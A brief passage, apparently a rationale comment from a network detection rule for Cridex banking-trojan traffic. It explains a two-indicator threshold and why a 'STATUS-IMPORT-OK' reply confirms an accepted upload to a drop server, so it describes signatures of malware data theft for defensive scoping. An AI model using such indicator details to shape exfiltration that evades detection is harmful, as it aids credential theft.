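Requiring two independent indicators for the Cridex verdict keeps a lone spoofed User-Agent on ordinary traffic from firing; the STATUS-IMPORT-OK check matters for incident scoping because it confirms the upload was accepted by the drop server, not merely attempted.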